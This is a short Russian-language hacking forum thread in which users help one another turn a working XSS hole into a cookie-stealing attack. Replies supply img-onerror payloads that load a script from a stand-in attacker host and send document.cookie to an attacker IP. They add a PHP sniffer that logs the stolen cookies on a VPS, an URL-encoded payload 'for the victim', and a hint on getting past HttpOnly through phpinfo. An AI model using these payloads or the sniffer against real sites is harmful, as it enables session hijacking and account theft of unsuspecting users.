xss вопрос

[qnit]

есть xss вида <img src=1 onerror=(alert(1))>
Как сделать ссылку на мой js

<img src=1 onerror=(src='tes.com\js.js')>

 

[poolshrimp]

Вот так, например:

<img src="1" onerror="s=document.createElement('script');s.src='//attacker.com/evil.js';document.body.appendChild(s)">

 

[apdcx0]

Если хочешь куки спиздить, вот пэйлоад:

<img src=x onerror=this.src='http://IP/?'+document.cookie;>

В принципе можешь другой пэйлоад заинжектить, раз у тебя этот проходит.

WebHacking101/xss-reflected-steal-cookie.md at master · R0B1NL1N/WebHacking101

Web-App-Hacking-Notes. Contribute to R0B1NL1N/WebHacking101 development by creating an account on GitHub.

github.com

Дальше у себя на VPS-ке сниффер подними:
В index.php:

<?php
if (isset($_GET['cookie']))
{
$text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of F Y h:i:s A');
$text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n";
$file = fopen("sniff.txt", "a");
fwrite($file, $text);
fclose($file);
}
?>

php -S 0.0.0.0:80 - запускаешь

Перед тем как жертве будешь кидать, пэйлоад обязательно заэнкоди, как пример - %3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%74%68%69%73%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%49%50%2f%3f%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3e

 

[FatalException]

Вот так, например:

<img src="1" onerror="s=document.createElement('script');s.src='//attacker.com/evil.js';document.body.appendChild(s)">

Как вы сохраняете изменение метода onerror — вам нужен доступ к самому источнику?

 

[qnit]

Продолжаем!Кто знает как http-only обойти?

 

[xanterq]

А может тогда и баунти поделим уже? Поищи в гугле, если есть phpinfo на сайте, можно стащить оттуда.